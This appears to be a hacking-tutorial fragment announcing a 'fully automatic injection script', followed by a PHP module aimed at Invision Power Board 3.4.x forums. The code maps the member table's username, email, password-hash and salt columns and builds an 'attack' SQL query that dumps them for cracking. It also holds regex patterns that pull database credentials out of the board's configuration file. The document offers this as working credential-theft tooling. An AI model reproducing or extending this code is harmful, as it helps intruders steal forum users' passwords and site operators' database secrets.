..cool, we will make a new module and not just some new module, nope let's make a fully automatic injection script! This tutorial is the first step into making this. Let's first explain..
<?php
/* Invision Power Board */
$_PROPERTIES = array();
$_PROPERTIES['name'] = "IPB";
$_PROPERTIES['version'] = "3.4.x";
$_PROPERTIES['usernamefield'] = "name";
$_PROPERTIES['emailfield'] = "email";
$_PROPERTIES['hashfield'] = "members_pass_hash";
$_PROPERTIES['saltfield'] = "members_pass_salt";
$_PROPERTIES['tablename'] = "members";
$_PROPERTIES['tableprefix'] = "ipb_";
$_PROPERTIES['filename'] = "ipb/ipba.php";
// use post variables instead if values are different from default
if(isset($_POST['iUseDefault']) && $_POST['iUseDefault']==0){
$_PROPERTIES['usernamefield'] = @mysql_real_escape_string($_POST['sUserNameField']);
$_PROPERTIES['emailfield'] = @mysql_real_escape_string($_POST['sEmailField']);
$_PROPERTIES['hashfield'] = @mysql_real_escape_string($_POST['sHashField']);
$_PROPERTIES['tablename'] = @mysql_real_escape_string($_POST['sTableName']);
$_PROPERTIES['tableprefix'] = @mysql_real_escape_string($_POST['sTablePrefix']);
}
$_PROPERTIES['queryraw'] = array();
$_PROPERTIES['queryraw']['attack'] = "SELECT ".$_PROPERTIES['usernamefield']." AS crackuser,".$_PROPERTIES['hashfield']." AS crackpass".(isset($_PROPERTIES['saltfield']) ? ",".$_PROPERTIES['saltfield']." AS crackhash" : "")." FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename'];
$_PROPERTIES['queryraw']['getemail'] = "SELECT ".$_PROPERTIES['emailfield']." AS temail FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."='/user/'";
if(isset($_GET['JSON'])){
session_cache_limiter('nocache');
header('Expires: '.gmdate('r',0));
header('Content-type: application/json');
echo json_encode($_PROPERTIES);
}
$_SYSTEM = array();
$_SYSTEM['name'] = $_PROPERTIES['name'];
$_SYSTEM['version'] = $_PROPERTIES['version'];
$_SYSTEM['patterns'] = array();
$_SYSTEM['patterns']['user'] = '/\$INFO\[\'sql_user\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['password'] = '/\$INFO\[\'sql_pass\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['host'] = '/\$INFO\[\'sql_host\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['database'] = '/\$INFO\[\'sql_database\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['file'] = "conf_global.php";
?>